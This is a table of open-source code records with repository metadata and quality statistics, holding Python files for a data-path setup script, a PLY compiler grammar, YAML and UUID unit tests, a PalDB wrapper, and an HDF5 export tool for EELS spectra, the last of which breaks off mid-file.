hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
19cefb59554afa364e4773842b11bb4a32b5748b | 575 | py | Python | deepnet/datasets/setup_data_paths.py | smoitra87/deepnet | c4f89c65f78298d846bd6dc0654b9c8f5e223f2b | [
"BSD-3-Clause"
] | null | null | null | deepnet/datasets/setup_data_paths.py | smoitra87/deepnet | c4f89c65f78298d846bd6dc0654b9c8f5e223f2b | [
"BSD-3-Clause"
] | null | null | null | deepnet/datasets/setup_data_paths.py | smoitra87/deepnet | c4f89c65f78298d846bd6dc0654b9c8f5e223f2b | [
"BSD-3-Clause"
] | null | null | null | from deepnet import util
import os
def SetupDataPbtxt(data_pbtxt_file, data_path):
data_pbtxt = util.ReadData(data_pbtxt_file)
for data in data_pbtxt.data:
fname = os.path.basename(data.file_pattern)
data.file_pattern = os.path.join(data_path, fname)
util.WritePbtxt(data_pbtxt_file, data_pbtxt)
if __name__ == '__main__':
from commands import getstatusoutput
for data_pbtxt_file in getstatusoutput("find . -name 'data.pbtxt'")[1].split():
SetupDataPbtxt(data_pbtxt_file, \
os.path.dirname(os.path.abspath(data_pbtxt_file)))
| 35.9375 | 83 | 0.735652 | 81 | 575 | 4.888889 | 0.358025 | 0.227273 | 0.19697 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002075 | 0.161739 | 575 | 15 | 84 | 38.333333 | 0.819502 | 0 | 0 | 0 | 0 | 0 | 0.057391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19d4e6ce2d2944c11621e48439ce13e4b92cc071 | 6,084 | py | Python | draguilator/draguitax.py | robsonzagrejr/draguilator | 3379f79250dc78f88b14fb6a819372eed4caf970 | [
"MIT"
] | null | null | null | draguilator/draguitax.py | robsonzagrejr/draguilator | 3379f79250dc78f88b14fb6a819372eed4caf970 | [
"MIT"
] | null | null | null | draguilator/draguitax.py | robsonzagrejr/draguilator | 3379f79250dc78f88b14fb6a819372eed4caf970 | [
"MIT"
] | null | null | null | """
Implementation of a Compiler for INE5426 - UFSC Authors:
Mateus Favarin Costa (18100539)
Robson Zagre Junior (18102721)
Wesly Carmesini Ataide (18100547)
"""
import ply.yacc as yacc
from draguilexer import tokens
def p_program(p):
'''program : statement
| funclist
| empty
'''
pass
def p_funclist(p):
'''funclist : funcdef _funclist
'''
pass
def p__funclist(p):
'''_funclist : funclist
| empty
'''
pass
def p_funcdef(p):
'''funcdef : DEFINE IDENT LPAREN paramlist RPAREN LBRACES statelist RBRACES
'''
pass
def p_paramlist(p):
'''paramlist : INT IDENT _paramlist
| FLOAT IDENT _paramlist
| STRING IDENT _paramlist
| empty
'''
pass
def p__paramlist(p):
'''_paramlist : COMMA paramlist
| empty
'''
pass
def p_statement(p):
'''statement : vardecl SEMICOLON
| atribstat SEMICOLON
| printstat SEMICOLON
| readstat SEMICOLON
| returnstat SEMICOLON
| ifstat
| forstat
| LBRACES statelist RBRACES
| BREAK SEMICOLON
| SEMICOLON
'''
pass
def p_vardecl(p):
'''vardecl : INT IDENT vardecl_line
| FLOAT IDENT vardecl_line
| STRING IDENT vardecl_line
'''
pass
def p_vardecl_line(p):
'''vardecl_line : LBRACKET INT_CONSTANT RBRACKET vardecl_line
| empty
'''
pass
def p_atribstat(p):
'''atribstat : lvalue ASSIGN _atribstat
'''
pass
def p__atribstat(p):
'''_atribstat : PLUS _atribstat_help
| MINUS _atribstat_help
| __atribstat
| IDENT ___atribstat
| allocexpression
'''
pass
def p__atribstat_help(p):
'''_atribstat_help : IDENT lvalue_line term_line numexpression_line _expression
| __atribstat
'''
pass
def p___atribstat(p):
'''__atribstat : INT_CONSTANT term_line numexpression_line _expression
| FLOAT_CONSTANT term_line numexpression_line _expression
| STRING_CONSTANT term_line numexpression_line _expression
| NULL term_line numexpression_line _expression
| LPAREN numexpression RPAREN term_line numexpression_line _expression
'''
pass
def p____atribstat(p):
'''___atribstat : lvalue_line term_line numexpression_line _expression
| LPAREN paramlistcall RPAREN
'''
pass
def p_funccall(p):
'''funccall : IDENT LPAREN paramlistcall RPAREN
'''
pass
#p[0] = "ident()"
def p_paramlistcall(p):
'''paramlistcall : IDENT _paramlistcall
| empty
'''
pass
def p__paramlistcall(p):
'''_paramlistcall : COMMA paramlistcall
| empty
'''
pass
def p_printstat(p):
'''printstat : PRINT expression
'''
pass
def p_readstat(p):
'''readstat : READ lvalue
'''
pass
def p_returnstat(p):
'''returnstat : RETURN
'''
pass
def p_ifstat(p):
'''ifstat : IF LPAREN expression RPAREN LBRACES statelist RBRACES _ifstat
'''
pass
def p__ifstat(p):
'''_ifstat : ELSE statement
| empty
'''
pass
def p_forstat(p):
'''forstat : FOR LPAREN atribstat SEMICOLON expression SEMICOLON atribstat RPAREN statement
'''
pass
def p_statelist(p):
'''statelist : statement _statelist
'''
pass
def p__statelist(p):
'''_statelist : statelist
| empty
'''
pass
def p_allocexpression(p):
'''allocexpression : NEW _allocexpression
'''
pass
def p__allocexpression(p):
'''_allocexpression : INT allocexpression_line
| FLOAT allocexpression_line
| STRING allocexpression_line
'''
pass
def p_allocexpression_line(p):
'''allocexpression_line : LBRACKET numexpression RBRACKET _allocexpression_line
'''
pass
def p__allocexpression_line(p):
'''_allocexpression_line : allocexpression_line
| empty
'''
pass
def p_expression(p):
'''expression : numexpression _expression
'''
pass
def p__expression(p):
'''_expression : LESS_THAN numexpression
| GREATER_THAN numexpression
| LESS_EQUAL_THAN numexpression
| GREATER_EQUAL_THAN numexpression
| EQUAL_TO numexpression
| NOT_EQUAL_TO numexpression
| empty
'''
pass
def p_numexpression(p):
'''numexpression : term numexpression_line
'''
pass
def p_numexpression_line(p):
'''numexpression_line : PLUS term numexpression_line
| MINUS term numexpression_line
| empty
'''
pass
def p_term(p):
'''term : unaryexpr term_line
'''
pass
def p_term_line(p):
'''term_line : TIMES unaryexpr term_line
| DIVIDE unaryexpr term_line
| MODULO unaryexpr term_line
| empty
'''
pass
def p_unaryexpr(p):
'''unaryexpr : factor
| PLUS factor
| MINUS factor
'''
pass
def p_factor(p):
'''factor : INT_CONSTANT
| FLOAT_CONSTANT
| STRING_CONSTANT
| NULL
| lvalue
| LPAREN numexpression RPAREN
'''
pass
def p_lvalue(p):
'''lvalue : IDENT lvalue_line
'''
pass
def p_lvalue_line(p):
'''lvalue_line : LBRACKET numexpression RBRACKET lvalue_line
| empty
'''
pass
def p_empty(p):
'''empty :'''
pass
# Error rule for syntax errors
def p_error(p):
print(f"Syntax error in input: {p.value} ({p.type})")
print("Current sentence form")
print(f"{parser.symstack} \n\n")
raise SyntaxError
# Build the parser
parser = yacc.yacc()
| 19.192429 | 96 | 0.571499 | 590 | 6,084 | 5.615254 | 0.184746 | 0.049502 | 0.09176 | 0.054935 | 0.347117 | 0.261395 | 0.106852 | 0.039843 | 0.039843 | 0.039843 | 0 | 0.007268 | 0.344181 | 6,084 | 316 | 97 | 19.253165 | 0.823058 | 0.506739 | 0 | 0.454545 | 0 | 0 | 0.049255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.465909 | false | 0.454545 | 0.022727 | 0 | 0.488636 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
19dbc53d03d9bbf0bca3d6a3a06ede254031c55c | 6,103 | py | Python | unittest/yaml_util_test.py | gregturn/spinnaker | 8731e9edc1619e798a76fedb30b26cf48fa62897 | [
"Apache-2.0"
] | null | null | null | unittest/yaml_util_test.py | gregturn/spinnaker | 8731e9edc1619e798a76fedb30b26cf48fa62897 | [
"Apache-2.0"
] | null | null | null | unittest/yaml_util_test.py | gregturn/spinnaker | 8731e9edc1619e798a76fedb30b26cf48fa62897 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import tempfile
import unittest
from spinnaker.yaml_util import YamlBindings
class YamlUtilTest(unittest.TestCase):
def test_load_dict(self):
expect = {'a': 'A',
'b': 0,
'c': ['A','B'],
'd': {'child': {'grandchild': 'x'}},
'e': None}
bindings = YamlBindings()
bindings.import_dict(expect)
self.assertEqual(expect, bindings.map)
def test_load_string(self):
yaml = """
a: A
b: 0
c:
- A
- B
d:
child:
grandchild: x
e:
"""
expect = {'a': 'A',
'b': 0,
'c': ['A','B'],
'd': {'child': {'grandchild': 'x'}},
'e': None}
bindings = YamlBindings()
bindings.import_string(yaml)
self.assertEqual(expect, bindings.map)
def test_load_path(self):
yaml = """
a: A
b: 0
c:
- A
- B
d:
child:
grandchild: x
e:
"""
expect = {'a': 'A',
'b': 0,
'c': ['A','B'],
'd': {'child': {'grandchild': 'x'}},
'e': None}
fd, temp_path = tempfile.mkstemp()
os.write(fd, yaml)
os.close(fd)
bindings = YamlBindings()
bindings.import_path(temp_path)
self.assertEqual(expect, bindings.map)
def test_load_composite_value(self):
bindings = YamlBindings()
bindings.import_dict({'a': 'A', 'b':'B'})
bindings.import_string('test: ${a}/${b}')
print str(bindings.map)
self.assertEqual('A/B', bindings.get('test'))
def test_update_field_union(self):
bindings = YamlBindings()
bindings.import_dict({'a': 'A'})
bindings.import_dict({'b': 'B'})
self.assertEqual({'a': 'A', 'b': 'B'}, bindings.map)
def test_update_field_union_child(self):
bindings = YamlBindings()
bindings.import_dict({'parent1': {'a': 'A'}, 'parent2': {'x': 'X'}})
bindings.import_dict({'parent1': {'b': 'B'}})
self.assertEqual({'parent1': {'a': 'A', 'b': 'B'},
'parent2': {'x': 'X'}},
bindings.map)
def test_update_field_replace_child(self):
bindings = YamlBindings()
bindings.import_dict({'parent': {'a': 'A', 'b': 'B', 'c': 'C'}})
bindings.import_dict({'parent': {'a': 'X', 'b': 'Y', 'z': 'Z'}})
self.assertEqual({'parent': {'a': 'X', 'b': 'Y', 'z': 'Z', 'c': 'C'}},
bindings.map)
def test_load_not_found(self):
bindings = YamlBindings()
bindings.import_dict({'field': '${injected.value}'})
self.assertEqual('${injected.value}', bindings.get('field'))
def test_load_tail_not_found(self):
bindings = YamlBindings()
bindings.import_dict({'field': '${injected.value}', 'injected': {}})
self.assertEqual('${injected.value}', bindings.get('field'))
def test_load_default(self):
bindings = YamlBindings()
bindings.import_dict({'field': '${injected.value:HELLO}'})
self.assertEqual('HELLO', bindings.get('field'))
def test_environ(self):
os.environ['TEST_VARIABLE'] = 'TEST_VALUE'
bindings = YamlBindings()
bindings.import_dict({'field': '${TEST_VARIABLE}'})
self.assertEqual('TEST_VALUE', bindings.get('field'))
def test_load_transitive(self):
bindings = YamlBindings()
bindings.import_dict({'field': '${injected.value}'})
bindings.import_dict({'injected': {'value': 'HELLO'}})
self.assertEqual('HELLO', bindings.get('field'))
def test_load_transitive_indirect(self):
bindings = YamlBindings()
bindings.import_dict({'field': '${injected.value}', 'found': 'FOUND'})
bindings.import_dict({'injected': {'value': '${found}'}})
self.assertEqual('FOUND', bindings.get('field'))
def test_load_key_not_found(self):
bindings = YamlBindings()
bindings.import_dict({'field': '${injected.value}', 'injected': {}})
with self.assertRaises(KeyError):
bindings.get('unknown')
def test_cyclic_reference(self):
bindings = YamlBindings()
bindings.import_dict({'field': '${injected.value}',
'injected': {'value': '${field}'}})
with self.assertRaises(ValueError):
bindings.get('field')
def test_replace(self):
bindings = YamlBindings()
bindings.import_dict({'a': 'A', 'container': {'b': 'B'}})
self.assertEqual('This is A B or C',
bindings.replace('This is ${a} ${container.b} or ${c:C}'))
def test_boolean(self):
bindings = YamlBindings()
bindings.import_string(
"t: true\nf: false\ndef: ${unkown:true}\nindirect: ${f}")
self.assertEqual(True, bindings.get('t'))
self.assertEqual(False, bindings.get('f'))
self.assertEqual(True, bindings.get('def'))
self.assertEqual(False, bindings.get('indirect'))
def test_number(self):
bindings = YamlBindings()
bindings.import_string(
"scalar: 123\nneg: -321\ndef: ${unkown:234}\nindirect: ${scalar}")
self.assertEqual(123, bindings.get('scalar'))
self.assertEqual(-321, bindings.get('neg'))
self.assertEqual(234, bindings.get('def'))
self.assertEqual(123, bindings.get('indirect'))
def test_list(self):
bindings = YamlBindings()
bindings.import_string(
"root:\n - elem: 'first'\n - elem: 2\ncopy: ${root}")
self.assertEqual([{'elem': 'first'}, {'elem': 2}],
bindings.get('root'))
self.assertEqual(bindings.get('root'), bindings.get('copy'))
if __name__ == '__main__':
loader = unittest.TestLoader()
suite = loader.loadTestsFromTestCase(YamlUtilTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| 31.621762 | 79 | 0.612977 | 729 | 6,103 | 5.015089 | 0.226337 | 0.095733 | 0.145514 | 0.176696 | 0.55279 | 0.460339 | 0.372265 | 0.324672 | 0.253282 | 0.207604 | 0 | 0.008658 | 0.205145 | 6,103 | 192 | 80 | 31.786458 | 0.745001 | 0.093233 | 0 | 0.476821 | 0 | 0.006623 | 0.180978 | 0.013043 | 0 | 0 | 0 | 0 | 0.172185 | 0 | null | null | 0 | 0.192053 | null | null | 0.006623 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19dc9d5ed99e8eeab8f90952e95c511b70380d0a | 1,210 | py | Python | tests/test_is_uuid.py | alvistack/daveoncode-python-string-utils | 78929d88d90b1f90cb4837528ed955166bf0f559 | [
"MIT"
] | 3 | 2020-08-20T10:27:13.000Z | 2021-11-02T20:28:16.000Z | tests/test_is_uuid.py | alvistack/daveoncode-python-string-utils | 78929d88d90b1f90cb4837528ed955166bf0f559 | [
"MIT"
] | null | null | null | tests/test_is_uuid.py | alvistack/daveoncode-python-string-utils | 78929d88d90b1f90cb4837528ed955166bf0f559 | [
"MIT"
] | null | null | null | from unittest import TestCase
from uuid import uuid4, uuid1
from string_utils import is_uuid
class IsUUIDTestCase(TestCase):
def test_should_consider_false_non_string_objects(self):
# noinspection PyTypeChecker
self.assertFalse(is_uuid(None))
# noinspection PyTypeChecker
self.assertFalse(is_uuid(1))
# noinspection PyTypeChecker
self.assertFalse(is_uuid([]))
# noinspection PyTypeChecker
self.assertFalse(is_uuid({'a': 1}))
# noinspection PyTypeChecker
self.assertFalse(is_uuid(True))
def test_should_accept_valid_uuid_objects(self):
for i in range(1000):
# noinspection PyTypeChecker
self.assertTrue(is_uuid(uuid4()))
self.assertTrue(is_uuid(uuid1()))
def test_should_accept_valid_uuid_strings(self):
for i in range(1000):
self.assertTrue(is_uuid(str(uuid4())))
self.assertTrue(is_uuid(str(uuid1())))
def test_accepts_hex_value_of_uuid(self):
for i in range(1000):
# noinspection PyTypeChecker
self.assertTrue(is_uuid(uuid4().hex, True))
self.assertTrue(is_uuid(uuid1().hex, True))
| 30.25 | 60 | 0.661157 | 141 | 1,210 | 5.432624 | 0.29078 | 0.093995 | 0.265013 | 0.156658 | 0.712794 | 0.58094 | 0.302872 | 0.180157 | 0.180157 | 0.180157 | 0 | 0.02407 | 0.244628 | 1,210 | 39 | 61 | 31.025641 | 0.814004 | 0.155372 | 0 | 0.136364 | 0 | 0 | 0.000986 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.181818 | false | 0 | 0.136364 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19dd4cb9e26fbf8d0f017d672356a19e0819e983 | 695 | py | Python | api/PalDB.py | zhaozhongyu/PalDB | 3249df7819009622d252470d27a4ca8aac03fe27 | [
"Apache-2.0"
] | 2 | 2017-04-11T00:20:53.000Z | 2017-04-24T08:03:07.000Z | api/PalDB.py | zhaozhongyu/PalDB | 3249df7819009622d252470d27a4ca8aac03fe27 | [
"Apache-2.0"
] | null | null | null | api/PalDB.py | zhaozhongyu/PalDB | 3249df7819009622d252470d27a4ca8aac03fe27 | [
"Apache-2.0"
] | null | null | null | #-------------------------------------------------------------------------------
# Project: Paldb
# Name: Paldb
# Purpose:
# Author: zhaozhongyu
# Created: 2/9/2017 4:23 PM
# Copyright: (c) "zhaozhongyu" "2/9/2017 4:23 PM"
# Licence: <your licence>
# -*- coding:utf-8 -*-
#-------------------------------------------------------------------------------
from Paldb.ipml import ReaderIpml, WriterIpml
class PalDB:
def __init__(self):
print("PalDB init.")
def createWriter(file):
print("PalDB createWriter.")
return WriterIpml.WriterIpml(file)
def createReader(file):
print("PalDB createReader.")
return ReaderIpml.ReaderIpml(file)
| 25.740741 | 80 | 0.493525 | 63 | 695 | 5.380952 | 0.539683 | 0.088496 | 0.035398 | 0.041298 | 0.064897 | 0.064897 | 0 | 0 | 0 | 0 | 0 | 0.033159 | 0.17554 | 695 | 26 | 81 | 26.730769 | 0.558464 | 0.52518 | 0 | 0 | 0 | 0 | 0.153125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.7 | 0.3 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
19e86df55eb77d18e63228fef4b36910e3bf4d42 | 6,799 | py | Python | pysemeels/tools/generate_hdf5_file.py | drix00/pysemeels | 64087a64f6b065027d978e0c5d1e48847c2802cf | [
"Apache-2.0"
] | null | null | null | pysemeels/tools/generate_hdf5_file.py | drix00/pysemeels | 64087a64f6b065027d978e0c5d1e48847c2802cf | [
"Apache-2.0"
] | null | null | null | pysemeels/tools/generate_hdf5_file.py | drix00/pysemeels | 64087a64f6b065027d978e0c5d1e48847c2802cf | [
"Apache-2.0"
] | null | null | null | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
.. py:currentmodule:: pysemeels.tools.generate_hdf5_file
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Generate HDF5 file from Hitachi EELS data.
"""
###############################################################################
# Copyright 2017 Hendrix Demers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Standard library modules.
import os.path
import logging
# Third party modules.
import numpy as np
# Local modules.
# Project modules.
from pysemeels.hitachi.eels_su.elv_text_file import ElvTextParameters
from pysemeels.hitachi.eels_su.elv_file import ElvFile
from pysemeels.tools.hdf5_file_labels import *
# Globals and constants variables.
class GenerateHdf5File(object):
def __init__(self, hdf5_file):
self.hdf5_file = hdf5_file
def add_spectrum(self, file_path, name=None):
if name is None:
basename, _extension = os.path.splitext(os.path.basename(file_path))
name = basename
spectrum_group = self.hdf5_file.create_group(name)
elv_text_file_path, _extension = os.path.splitext(file_path)
elv_text_file_path += '.txt'
with open(elv_text_file_path, 'r', encoding="UTF-16", errors='ignore') as elv_text_file:
elv_text_parameters = ElvTextParameters()
elv_text_parameters.read(elv_text_file)
spectrum_group.attrs[HDF5_MODEL] = elv_text_parameters.model
spectrum_group.attrs[HDF5_SAMPLE_HEIGHT] = elv_text_parameters.sample_height_mm
spectrum_group.attrs[HDF5_FILE_PATH] = elv_text_parameters.file_name
spectrum_group.attrs[HDF5_COMMENT] = elv_text_parameters.comment
spectrum_group.attrs[HDF5_DATE] = elv_text_parameters.date
spectrum_group.attrs[HDF5_TIME] = elv_text_parameters.time
spectrum_group.attrs[HDF5_ACCELERATING_VOLTAGE_V] = elv_text_parameters.accelerating_voltage_V
spectrum_group.attrs[HDF5_ENERGY_WIDTH_eV] = elv_text_parameters.energy_width_eV
spectrum_group.attrs[HDF5_ENERGY_LOSS] = elv_text_parameters.energy_loss_eV
spectrum_group.attrs[HDF5_ACQUISITION_SPEED] = elv_text_parameters.speed_us
with open(file_path, 'r', encoding="ANSI", errors='ignore') as elv_text_file:
elv_file = ElvFile()
elv_file.read(elv_text_file)
self.compare_attribute(spectrum_group, HDF5_DATE, elv_file.date)
self.compare_attribute(spectrum_group, HDF5_TIME, elv_file.time)
self.compare_attribute(spectrum_group, HDF5_COMMENT, elv_file.comment)
self.compare_attribute(spectrum_group, HDF5_ACQUISITION_SPEED, elv_file.dose)
self.compare_attribute(spectrum_group, HDF5_ENERGY_LOSS, elv_file.le)
spectrum_group.attrs[HDF5_RAW] = elv_file.raw
self.compare_attribute(spectrum_group, HDF5_ENERGY_WIDTH_eV, elv_file.energy_width)
spectrum_group.attrs[HDF5_DUAL_DET_POSITION] = elv_file.dual_det_position
spectrum_group.attrs[HDF5_DUAL_DET_POST] = elv_file.dual_det_post
spectrum_group.attrs[HDF5_DUAL_DET_CENTER] = elv_file.dual_det_center
spectrum_group.attrs[HDF5_Q1] = elv_file.q1
spectrum_group.attrs[HDF5_Q1S] = elv_file.q1s
spectrum_group.attrs[HDF5_Q2] = elv_file.q2
spectrum_group.attrs[HDF5_Q2S] = elv_file.q2s
spectrum_group.attrs[HDF5_Q3] = elv_file.q3
spectrum_group.attrs[HDF5_H1] = elv_file.h1
spectrum_group.attrs[HDF5_H1S] = elv_file.h1s
spectrum_group.attrs[HDF5_H2] = elv_file.h2
spectrum_group.attrs[HDF5_H2S] = elv_file.h2s
spectrum_group.attrs[HDF5_H4] = elv_file.h4
spectrum_group.attrs[HDF5_ELV_X] = elv_file.elv_x
spectrum_group.attrs[HDF5_ELV_Y] = elv_file.elv_y
spectrum_group.attrs[HDF5_SPECTRUM_ALIGNMENT_X] = elv_file.spectrum_alignment_x
spectrum_group.attrs[HDF5_SPECTRUM_ALIGNMENT_Y] = elv_file.spectrum_alignment_y
spectrum_group.attrs[HDF5_DET_SPEC_ALIGNMENT_X] = elv_file.det_spec_alignment_x
spectrum_group.attrs[HDF5_DET_SPEC_ALIGNMENT_Y] = elv_file.det_spec_alignment_y
spectrum_group.attrs[HDF5_DET_MAP_ALIGNMENT_X] = elv_file.det_map_alignment_x
spectrum_group.attrs[HDF5_DET_MAP_ALIGNMENT_Y] = elv_file.det_map_alignment_y
spectrum_group.attrs[HDF5_MAGNIFICATION] = elv_file.mag
data = np.zeros((1023, 5))
data[:, 0] = elv_file.energies_eV[:-1]
data[:, 1] = elv_file.counts[:-1]
data[:, 2] = elv_file.raw_counts[:-1]
data[:, 3] = elv_file.gain_corrections[:-1]
data[:, 4] = elv_file.dark_currents[:-1]
spectrum_data_set = spectrum_group.create_dataset(HDF5_SPECTRUM, data=data)
data = np.arange(1, 1023+1)
spectrum_channel_data_set = spectrum_group.create_dataset(HDF5_SPECTRUM_CHANNELS, data=data)
spectrum_data_set.dims.create_scale(spectrum_channel_data_set, HDF5_SPECTRUM_CHANNEL)
spectrum_data_set.dims[0].attach_scale(spectrum_channel_data_set)
data_types = [HDF5_SPECTRUM_ENERGIES_eV, HDF5_SPECTRUM_COUNTS, HDF5_SPECTRUM_RAW_COUNTS,
HDF5_SPECTRUM_GAIN_CORRECTIONS, HDF5_SPECTRUM_DARK_CURRENTS]
max_size = max([len(data_type) for data_type in data_types])
data = np.array(data_types, dtype="S{}".format(max_size+1))
spectrum_types_data_set = spectrum_group.create_dataset(HDF5_SPECTRUM_DATA_TYPES, data=data)
spectrum_data_set.dims.create_scale(spectrum_types_data_set, HDF5_SPECTRUM_DATA_TYPE)
spectrum_data_set.dims[1].attach_scale(spectrum_types_data_set)
def compare_attribute(self, spectrum_group, attribute_name, attribute_value):
